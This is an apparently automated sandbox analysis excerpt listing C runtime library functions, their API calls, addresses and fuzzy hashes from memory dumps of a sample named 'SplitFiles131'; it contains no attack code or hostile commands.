Opcode Fuzzy Hash: d473ddd763a2c2c897fe5dcf6db478f1cae410dc6a90a74f6531b1057af5c91b
Instruction Fuzzy Hash: B821B832709121BAD734CF18E901A97F3A6EB54B60BD68476E909D7600E735DE81C35C

Uniqueness

Uniqueness Score: -1.00%

Function 0040F5F5 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0040F601
IsDebuggerPresent.KERNEL32 ref: 0040F6CD
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040F6ED
UnhandledExceptionFilter.KERNEL32(?), ref: 0040F6F7

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: b905c57fb93a7ea2142a1a6e2d5c4873a38ca60d89c803f25540929c33dac397
Instruction ID: e08a22daeabf917fd0aba5c617d7a5f2469330a7746797e8074d373f0119b78b
Opcode Fuzzy Hash: b905c57fb93a7ea2142a1a6e2d5c4873a38ca60d89c803f25540929c33dac397
Instruction Fuzzy Hash: 7131FA75D052189BDB20DFA5D989BCDBBB8BF08304F1041BAE409A7290EB755A89CF49

Uniqueness

Uniqueness Score: -1.00%

Function 10003AD4 Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 10003AE0
IsDebuggerPresent.KERNEL32 ref: 10003BAC
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10003BCC
UnhandledExceptionFilter.KERNEL32(?), ref: 10003BD6

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 87d6071aa85ca3aceb4d5d49843fcbf5a144f8cfc35fef28e923873c0919a720
Instruction ID: 6c05d683b9c83b65af34da63d054ec9b8364850d5d560307e6d3fdc6a332805a
Opcode Fuzzy Hash: 87d6071aa85ca3aceb4d5d49843fcbf5a144f8cfc35fef28e923873c0919a720
Instruction Fuzzy Hash: 7E311875D052189BEB11DFA4D989BCDBBB8EF08344F1080AAE54CAB254EB719A848F05

Uniqueness

Uniqueness Score: -1.00%

Function 0041336B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00413463
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0041346D
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0041347A

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 08f293217c44ab737df140b6d3b84d0e147ad2ade69c0ac62fd1d43b73898614
Instruction ID: eed5281d3674d54920691af3d978e0505281e735928a2e98dc149aff2d4c60b5
Opcode Fuzzy Hash: 08f293217c44ab737df140b6d3b84d0e147ad2ade69c0ac62fd1d43b73898614
Instruction Fuzzy Hash: 9131C4749012289BCB21DF69DC89BDDBBB4BF08714F5041EAE41CA7290E7749B858F49

Uniqueness

Uniqueness Score: -1.00%

Function 10006180 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10006278
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 10006282
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 1000628F

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 9a692d0d77a07a7f37119dcdd5ace2a3b37eeee0a1bfcb31a8054ad36fdd368c
Instruction ID: abb11d6b70c581ee1350689d9832688372e2db19cf6905fbf3b29f181f2760c3
Opcode Fuzzy Hash: 9a692d0d77a07a7f37119dcdd5ace2a3b37eeee0a1bfcb31a8054ad36fdd368c
Instruction Fuzzy Hash: F431C4749012289BDB21DF68DC89BCDBBB8FF08350F5041EAE41CA7251EB709B858F45

Uniqueness

Uniqueness Score: -1.00%

Function 10006CE1 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(10007C68,?,10006CE0,10002482,?,10007C68,10002482,10007C68), ref: 10006D03
TerminateProcess.KERNEL32(00000000,?,10006CE0,10002482,?,10007C68,10002482,10007C68), ref: 10006D0A
ExitProcess.KERNEL32 ref: 10006D1C

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: b48507955d557410ab621ea9767185c5b28cf2fcba806ca0d5141bf90050bc88
Instruction ID: 8090ae278696ef8d63f7159b1b54225b98daf67b6e3b66e302f5d8a45b402e03
Opcode Fuzzy Hash: b48507955d557410ab621ea9767185c5b28cf2fcba806ca0d5141bf90050bc88
Instruction Fuzzy Hash: 6EE08C31600148AFEB12EF60CD48B493B6AFB092C1F208415F8058A131CBB6ED91CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0040F7F3 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040F809

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: af8edf595f28d6e0de3f7c832e975c9ce316b7f81847fa13e3e8cff5d50537ce
Instruction ID: 442fd19c12fe52d52473a448f085702681ee7344cd8d47f004f5f7bce1392ef5
Opcode Fuzzy Hash: af8edf595f28d6e0de3f7c832e975c9ce316b7f81847fa13e3e8cff5d50537ce
Instruction Fuzzy Hash: 825159B2A102199BEB29CF59D9857AABBF0FB48314F14843BD405EB791E378D904CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0042041F Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc7f42db509279383e3cc01eb7112f14e58f64f47ca781cad5004ddb32a561f
Instruction ID: 190f8b4917172ce852a4c6c2ee3eb9eeabb4d9f649594b05df5e9f634885cc74
Opcode Fuzzy Hash: 7fc7f42db509279383e3cc01eb7112f14e58f64f47ca781cad5004ddb32a561f
Instruction Fuzzy Hash: 92E08C72A11278EBCB15EB89D90498AF3FCEB45B18B95449BBA05D3201C278DE40DBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004429E7 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ca6e8abd497ec3a1c156abf087cd513271e0a7e0f941d3f632673506c1267ca
Instruction ID: c2f19552910a0c3bc7347bbf13de0f87239dfd182ffd37263a02f476a58fa8e8
Opcode Fuzzy Hash: 2ca6e8abd497ec3a1c156abf087cd513271e0a7e0f941d3f632673506c1267ca
Instruction Fuzzy Hash: 3AE08C72911238EBCB24DF89DA0499AF3ECEB44B55B51449BF901F3200C6B4DE00C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 100091C7 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5142b2ecf730a3c36b94ed0dd87861f2f8d441af9f974cc276bfbc499525e151
Instruction ID: 28c602149d0e72d51d161a6ecb967c1a520d45018b1f8e98f239418fe4463083
Opcode Fuzzy Hash: 5142b2ecf730a3c36b94ed0dd87861f2f8d441af9f974cc276bfbc499525e151
Instruction Fuzzy Hash: 5AE0EC72A11228EBCB15DB98D95498AB7ECFB49B90B1545AAB511D3215C270DE01C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 0044028F Relevance: .0, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2bf1e3dbd56a5e62411fbd5e71e5e7a82189cacba0b21ec395735c552563347
Instruction ID: 16c2de7a8d20c9c44f0cfcec9700f4c07f8ea1dcaa74a4bc5a03d74aca8627af
Opcode Fuzzy Hash: b2bf1e3dbd56a5e62411fbd5e71e5e7a82189cacba0b21ec395735c552563347
Instruction Fuzzy Hash: 22E04F31000108EBDF216F94CE8DA493B29FB40345F000469FE04AA671CB79DC91DA48

Uniqueness

Uniqueness Score: -1.00%

Function 00419040 Relevance: 22.9, APIs: 15, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004190AF
_free.LIBCMT ref: 004190C5
_free.LIBCMT ref: 004190D8
_free.LIBCMT ref: 004190ED
_free.LIBCMT ref: 00419102
GetCPInfo.KERNEL32(?,?), ref: 0041914C

Part of subcall function 004216C5: _free.LIBCMT ref: 00421730

_free.LIBCMT ref: 004193B7
_free.LIBCMT ref: 004193CA
_free.LIBCMT ref: 004193D8
_free.LIBCMT ref: 004193E3
_free.LIBCMT ref: 00419425
_free.LIBCMT ref: 0041942D
_free.LIBCMT ref: 00419433
_free.LIBCMT ref: 0041943B
_free.LIBCMT ref: 00419449

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: c55eede84f28e057531605bdedab24d4a33e5c8ac86e8fc84041852ef0a9f38b
Instruction ID: b3dde5999e6bd8c58c9687087de5c6fa98508f20abd658152064e8f8f6389a2c
Opcode Fuzzy Hash: c55eede84f28e057531605bdedab24d4a33e5c8ac86e8fc84041852ef0a9f38b
Instruction Fuzzy Hash: 4FD1A0719002059FEB15CFA5C891BEEB7F5BF08304F14456EE899A7382D778AC85CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0044334A Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00443383
___free_lconv_mon.LIBCMT ref: 0044338E

Part of subcall function 00442EB5: _free.LIBCMT ref: 00442ED2
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442EE4
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442EF6
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F08
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F1A
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F2C
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F3E
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F50
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F62
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F74
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F86
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F98
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442FAA

_free.LIBCMT ref: 004433A5
_free.LIBCMT ref: 004433BA
_free.LIBCMT ref: 004433C5
_free.LIBCMT ref: 004433E7
_free.LIBCMT ref: 004433FA
_free.LIBCMT ref: 00443408
_free.LIBCMT ref: 00443413
_free.LIBCMT ref: 0044344B
_free.LIBCMT ref: 00443452
_free.LIBCMT ref: 0044346F
_free.LIBCMT ref: 00443487

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free$___free_lconv_mon
String ID:
API String ID: 3658870901-0
Opcode ID: a944ca6634b5d74932c30d559000e04cde607573212888ef64c986212d955d2d
Instruction ID: ce84940d4ec221c3e00cea4fbe0e61062730256890f47c7b2aa3b88f8ab69c0d
Opcode Fuzzy Hash: a944ca6634b5d74932c30d559000e04cde607573212888ef64c986212d955d2d
Instruction Fuzzy Hash: 28314E31600601AEFB219E3AD845B9B77E4AF01B15F14881FE455D72A1DF78EE818B1C

Uniqueness

Uniqueness Score: -1.00%

Function 00426386 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 004263CA

Part of subcall function 00425632: _free.LIBCMT ref: 0042564F
Part of subcall function 00425632: _free.LIBCMT ref: 00425661
Part of subcall function 00425632: _free.LIBCMT ref: 00425673
Part of subcall function 00425632: _free.LIBCMT ref: 00425685
Part of subcall function 00425632: _free.LIBCMT ref: 00425697
Part of subcall function 00425632: _free.LIBCMT ref: 004256A9
Part of subcall function 00425632: _free.LIBCMT ref: 004256BB
Part of subcall function 00425632: _free.LIBCMT ref: 004256CD
Part of subcall function 00425632: _free.LIBCMT ref: 004256DF
Part of subcall function 00425632: _free.LIBCMT ref: 004256F1
Part of subcall function 00425632: _free.LIBCMT ref: 00425703
Part of subcall function 00425632: _free.LIBCMT ref: 00425715
Part of subcall function 00425632: _free.LIBCMT ref: 00425727

_free.LIBCMT ref: 004263BF

Part of subcall function 0041E2B8: HeapFree.KERNEL32(00000000,00000000,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?), ref: 0041E2CE
Part of subcall function 0041E2B8: GetLastError.KERNEL32(?,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?,?), ref: 0041E2E0

_free.LIBCMT ref: 004263E1
_free.LIBCMT ref: 004263F6
_free.LIBCMT ref: 00426401
_free.LIBCMT ref: 00426423
_free.LIBCMT ref: 00426436
_free.LIBCMT ref: 00426444
_free.LIBCMT ref: 0042644F
_free.LIBCMT ref: 00426487
_free.LIBCMT ref: 0042648E
_free.LIBCMT ref: 004264AB
_free.LIBCMT ref: 004264C3

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 88f30a99e55331c7f508eb551a6b5f58649f1248a518a039e11fef256e7b3f57
Instruction ID: e81e40b5f298d664f8950b5869667bb163734d9678a7409bf98161f4c1fe4a14
Opcode Fuzzy Hash: 88f30a99e55331c7f508eb551a6b5f58649f1248a518a039e11fef256e7b3f57
Instruction Fuzzy Hash: D33162316006149FEB24AA7AE845B9BB3E8AF00314F91456FE899D7291DF7CEC80C71C

Uniqueness

Uniqueness Score: -1.00%

Function 1000AEB3 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 1000AEF7

Part of subcall function 1000B99D: _free.LIBCMT ref: 1000B9BA
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000B9CC
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000B9DE
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000B9F0
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA02
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA14
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA26
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA38
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA4A
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA5C
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA6E
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA80
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA92

_free.LIBCMT ref: 1000AEEC

Part of subcall function 10008701: RtlFreeHeap.NTDLL(00000000,00000000,?,100074AC), ref: 10008717
Part of subcall function 10008701: GetLastError.KERNEL32(?,?,100074AC), ref: 10008729

_free.LIBCMT ref: 1000AF0E
_free.LIBCMT ref: 1000AF23
_free.LIBCMT ref: 1000AF2E
_free.LIBCMT ref: 1000AF50
_free.LIBCMT ref: 1000AF63
_free.LIBCMT ref: 1000AF71
_free.LIBCMT ref: 1000AF7C
_free.LIBCMT ref: 1000AFB4
_free.LIBCMT ref: 1000AFBB
_free.LIBCMT ref: 1000AFD8
_free.LIBCMT ref: 1000AFF0

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: c4e98949ab35aafe9e56d21f341b4b46aaaa1c26fbfc12bf4678de360067af1f
Instruction ID: 98d3de5cb3a98999ebd56d36befb0731ec5fbc7688b04e9877a88235aa96296e
Opcode Fuzzy Hash: c4e98949ab35aafe9e56d21f341b4b46aaaa1c26fbfc12bf4678de360067af1f
Instruction Fuzzy Hash: 0A3157726046069FFB21DAB9D881B6A73E9FF013D0F614529E099D6199DE35FE808B20

Uniqueness

Uniqueness Score: -1.00%

Function 00425730 Relevance: 18.4, APIs: 12, Instructions: 373COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00425778
_free.LIBCMT ref: 0042579C
_free.LIBCMT ref: 004257A9
_free.LIBCMT ref: 004257CE
_free.LIBCMT ref: 004257DB
_free.LIBCMT ref: 004257E4
_free.LIBCMT ref: 00425ABE
_free.LIBCMT ref: 00425AC6

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: d1ccfb6d5d4b89e14be0686283f280dc6ec478f279d77e8c09b8cbf74dc5944d
Instruction ID: 569e6a71d5f44d06fa27ae0c400f08ba275592510054ad0f9e67e0790a3e9e44
Opcode Fuzzy Hash: d1ccfb6d5d4b89e14be0686283f280dc6ec478f279d77e8c09b8cbf74dc5944d
Instruction Fuzzy Hash: 3DC16275F40214AFDB20DAA9DC86FDFB7F8AF48704F54016AFA05FB282D67499408B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041D783 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 0041DA24, 0041DA29

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 8f4f84f8da90cf00b070d342344e91b5c399ffd5b14068e3114e3e9a8c8d54fe
Instruction ID: 414b9fb87afc50a8a3d8bfe03c00f007ed18bb814e769fe5a88ecae7e3a98d83
Opcode Fuzzy Hash: 8f4f84f8da90cf00b070d342344e91b5c399ffd5b14068e3114e3e9a8c8d54fe
Instruction Fuzzy Hash: ACC106F0E08245AFDF15DF99C881BEE7BB5AF49304F04405AE415AB392C7789AC1CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00412112 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 0041220F
type_info::operator==.LIBVCRUNTIME ref: 00412231
___TypeMatch.LIBVCRUNTIME ref: 00412340
IsInExceptionSpec.LIBVCRUNTIME ref: 00412412
_UnwindNestedFrames.LIBCMT ref: 00412496
CallUnexpected.LIBVCRUNTIME ref: 004124B1

Strings

csm, xrefs: 00412268
csm, xrefs: 004121BC
csm, xrefs: 0041214F

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: d5dfb756700b109f77bad092a4cf65170d38a92c2de80a3b210a90049ee47108
Instruction ID: 21aa7bd5de75da7cd703e37400f2b4a3502758b12b2b00924095f405172d1fb9
Opcode Fuzzy Hash: d5dfb756700b109f77bad092a4cf65170d38a92c2de80a3b210a90049ee47108
Instruction Fuzzy Hash: 4CB1A031800219EFCF15DFA5DA819EEB7B5FF18314B10405BE914AB311D7B8EAA1CB99

Uniqueness

Uniqueness Score: -1.00%

Function 10004C21 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 10004D1E
type_info::operator==.LIBVCRUNTIME ref: 10004D40
___TypeMatch.LIBVCRUNTIME ref: 10004E4F
IsInExceptionSpec.LIBVCRUNTIME ref: 10004F21
_UnwindNestedFrames.LIBCMT ref: 10004FA5
CallUnexpected.LIBVCRUNTIME ref: 10004FC0

Strings

csm, xrefs: 10004C5E
csm, xrefs: 10004CCB
csm, xrefs: 10004D77

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: c280cf51245476ab5a6ca9c2466aed320dec0198e46a52e5e0ca7a664b3de09a
Instruction ID: 240bac43b3023af98cd0cad224976453cf76ecf695f899d999e54e670dd59ab9
Opcode Fuzzy Hash: c280cf51245476ab5a6ca9c2466aed320dec0198e46a52e5e0ca7a664b3de09a
Instruction Fuzzy Hash: 98B1A0B5C0024AEFEF14CF94C88199E77B5FF04391F12416AE8156B21ADB31EA51CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0041CA4B Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041CA61

Part of subcall function 0041E2B8: HeapFree.KERNEL32(00000000,00000000,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?), ref: 0041E2CE
Part of subcall function 0041E2B8: GetLastError.KERNEL32(?,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?,?), ref: 0041E2E0

_free.LIBCMT ref: 0041CA6D
_free.LIBCMT ref: 0041CA78
_free.LIBCMT ref: 0041CA83
_free.LIBCMT ref: 0041CA8E
_free.LIBCMT ref: 0041CA99
_free.LIBCMT ref: 0041CAA4
_free.LIBCMT ref: 0041CAAF
_free.LIBCMT ref: 0041CABA
_free.LIBCMT ref: 0041CAC8

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 064518bb8398a549d41507d19e53a4755c223495735e655d29204e71220b294f
Instruction ID: 5b4a2eb99e861f4b6b1488fadc0f121773fdfa5924bf458925bca44d6de24a48
Opcode Fuzzy Hash: 064518bb8398a549d41507d19e53a4755c223495735e655d29204e71220b294f
Instruction Fuzzy Hash: B021C076900108AFDB45EF96C891DDD7BB8BF08344F8041AAF5199B261D775DA84CB84

Uniqueness

Uniqueness Score: -1.00%

